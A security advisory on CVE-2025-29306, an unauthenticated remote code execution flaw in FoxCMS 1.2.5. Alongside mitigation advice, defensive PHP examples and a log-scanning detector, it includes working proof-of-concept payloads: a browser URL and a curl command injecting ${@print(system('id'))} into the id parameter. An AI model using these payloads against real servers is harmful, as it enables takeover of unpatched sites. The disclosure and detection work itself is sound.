CVE-2025-29306 – Unauthenticated Remote Code Execution in FoxCMS v1.2.5 via Unserialize Injection

Jul 3, 2025
Discover details about CVE-2025-29306, a critical RCE vulnerability in FoxCMS 1.2.5. Learn how unsafe use of PHP’s unserialize() function enables remote attackers to execute arbitrary system commands.
Overview
CVE-2025-29306 is a critical remote code execution (RCE) vulnerability affecting FoxCMS version 1.2.5. The flaw stems from unsafe handling of the id parameter, which is passed directly into PHP’s unserialize() function without validation. Attackers can supply malicious serialized PHP objects that trigger arbitrary command execution via system().
- CVE ID: CVE-2025-29306
- Severity: Critical
- CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 71.52%
- Affected Version: FoxCMS ≤ 1.2.5
- Patched Version: None released as of writing
- Authentication Required: No
- Impact: Remote Code Execution
Technical Breakdown
FoxCMS uses unserialize() directly on user-supplied input from the id parameter. When a malicious serialized PHP object is supplied, FoxCMS inadvertently executes attacker-controlled PHP code.
A typical payload might inject PHP code such as:
${@print_r(@system("id"))}
When deserialized and evaluated, this results in arbitrary OS command execution. This technique is known as PHP Object Injection (POI), leveraging unserialize() as the initial injection vector.
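The following is an added illustration, not FoxCMS code and not from the advisory's author: it places the vulnerable pattern the advisory describes (a raw request parameter handed straight to unserialize()) beside a hardened handler. The parameter name id follows the advisory; the function names, the integer-id assumption and the sample inputs are hypothetical.

```php
<?php
declare(strict_types=1);

// VULNERABLE (pattern only, hypothetical function name): whatever the client
// sends is handed to unserialize(). A crafted string can instantiate any class
// the autoloader can reach and fire its magic methods (__wakeup, __destruct,
// __toString), which is the PHP Object Injection primitive the advisory names.
function loadCaseVulnerable(string $rawId): mixed
{
    return unserialize($rawId); // attacker controls the object graph
}

// HARDENED step 1: an id is a record identifier, so validate it as a bounded
// integer and never treat it as structured data at all.
function parseCaseId(string $rawId): ?int
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => PHP_INT_MAX],
    ]);
    return $id === false ? null : $id;
}

// HARDENED step 2: where structured client data is genuinely needed, carry it
// as JSON, which cannot express PHP objects, instead of native serialization.
function decodeClientPayload(string $raw): ?array
{
    try {
        $data = json_decode($raw, true, 8, JSON_THROW_ON_ERROR);
    } catch (JsonException) {
        return null;
    }
    return is_array($data) ? $data : null;
}

// HARDENED step 3 (stopgap for legacy code that cannot drop unserialize() yet):
// refuse every class, so no gadget is instantiated. Objects in the input
// degrade to __PHP_Incomplete_Class, which has no magic methods to trigger.
function unserializeScalarsOnly(string $raw): mixed
{
    return unserialize($raw, ['allowed_classes' => false]);
}

// Constructed sample inputs: a benign id, a serialized object, and the
// evaluation wrapper quoted in the advisory. Only the integer gets through.
foreach (['42', 'O:8:"stdClass":0:{}', '${@print(phpinfo())}'] as $sample) {
    $id = parseCaseId($sample);
    printf("%-24s -> %s\n", $sample, $id === null ? 'rejected' : "case #$id");
}
```

Step 1 is the real fix for an id parameter; steps 2 and 3 apply where the application genuinely needs structured client input. Note that allowed_classes => false does not make unserialize() safe against malformed input or resource exhaustion, so it is a bridge, not a destination.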
Conditions for Exploitation
- FoxCMS v1.2.5 installed and publicly reachable
- No login or authentication required
- PHP deserialization gadgets available in the environment
- PHP has shell access (default in many configurations)
Exploitation Steps
To compromise a vulnerable instance, an attacker crafts a POST request to the vulnerable case display page, injecting PHP code that is subsequently written to a .php file.
Simple Browser PoC
A known exploit simply calls phpinfo(). Replace TARGET with the target’s URL or IP; visiting the URL reveals full phpinfo output, confirming code execution.
http://TARGET/images/index.html?id=${@print(phpinfo())}
PoC with curl
Swap out phpinfo() for an OS command, e.g. id:
curl "http://TARGET/images/index.html?id=%24%7B%40print%28system%28%22id%22%29%29%7D"
This confirms the vulnerability and demonstrates remote code execution via unserialize-based injection in FoxCMS v1.2.5.
Mitigation
No official patch exists yet. Users should:
- Remove or replace unserialize() usage with safer methods (e.g. JSON decoding)
- Filter or validate all input parameters
- Block public access to vulnerable pages
- Deploy WAF signatures to detect serialized payloads
- Disable dangerous PHP functions like system() if not needed
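As an added example for the detection item above (not part of the advisory and not FoxCMS code), the script below scans web-server access logs for the two indicator families this CVE produces: the ${@...} evaluation wrapper from the PoC and the O:/C:/a: prefixes of native PHP serialization. The log lines are constructed for the example; the indicator names and the combined-log regex are this example's own choices.

```php
<?php
declare(strict_types=1);

// Constructed sample access-log lines in Apache combined format; not real traffic.
const SAMPLE_LOG = <<<'LOG'
203.0.113.10 - - [03/Jul/2025:10:15:01 +0000] "GET /images/index.html?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [03/Jul/2025:10:15:07 +0000] "GET /images/index.html?id=%24%7B%40print%28system%28%22id%22%29%29%7D HTTP/1.1" 200 318 "-" "curl/8.5.0"
203.0.113.12 - - [03/Jul/2025:10:15:09 +0000] "GET /images/index.html?id=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D HTTP/1.1" 200 411 "-" "python-requests/2.32"
203.0.113.13 - - [03/Jul/2025:10:15:20 +0000] "POST /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
LOG;

// Indicators are matched against the URL-decoded query string.
const INDICATORS = [
    'php_eval_wrapper'      => '/\$\{\s*@/',                      // ${@...}
    'php_serialized_object' => '/(?:^|[^A-Za-z0-9])[OC]:\d+:"/',  // O:8:"Foo"  C:3:"Bar"
    'php_serialized_array'  => '/(?:^|[^A-Za-z0-9])a:\d+:\{/',    // a:2:{...}
];

// Pull the query string out of the request line and decode it. Decoding twice
// catches double-encoded requests, a common signature-evasion trick.
function extractQuery(string $line): ?string
{
    if (!preg_match('/"(?:GET|POST|PUT|HEAD) \S*?\?(\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null; // no query string on this request
    }
    return rawurldecode(rawurldecode($m[1]));
}

// Return the names of every indicator that fires on one log line.
function scanLine(string $line): array
{
    $query = extractQuery($line);
    if ($query === null) {
        return [];
    }
    $hits = [];
    foreach (INDICATORS as $name => $regex) {
        if (preg_match($regex, $query) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Map 1-based line numbers to their indicator hits, skipping clean lines.
function scanLog(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $index => $line) {
        $hits = scanLine($line);
        if ($hits !== []) {
            $findings[$index + 1] = $hits;
        }
    }
    return $findings;
}

foreach (scanLog(SAMPLE_LOG) as $lineNo => $hits) {
    printf("line %d: %s\n", $lineNo, implode(', ', $hits));
}
```

Run with php scan.php; the first sample line (a plain numeric id) and the fourth (no query string) produce nothing, while the two encoded payload lines are flagged. The same regexes can seed a WAF rule, but a WAF inspects the request before decoding, so the rule there must either decode first or match the percent-encoded forms as well.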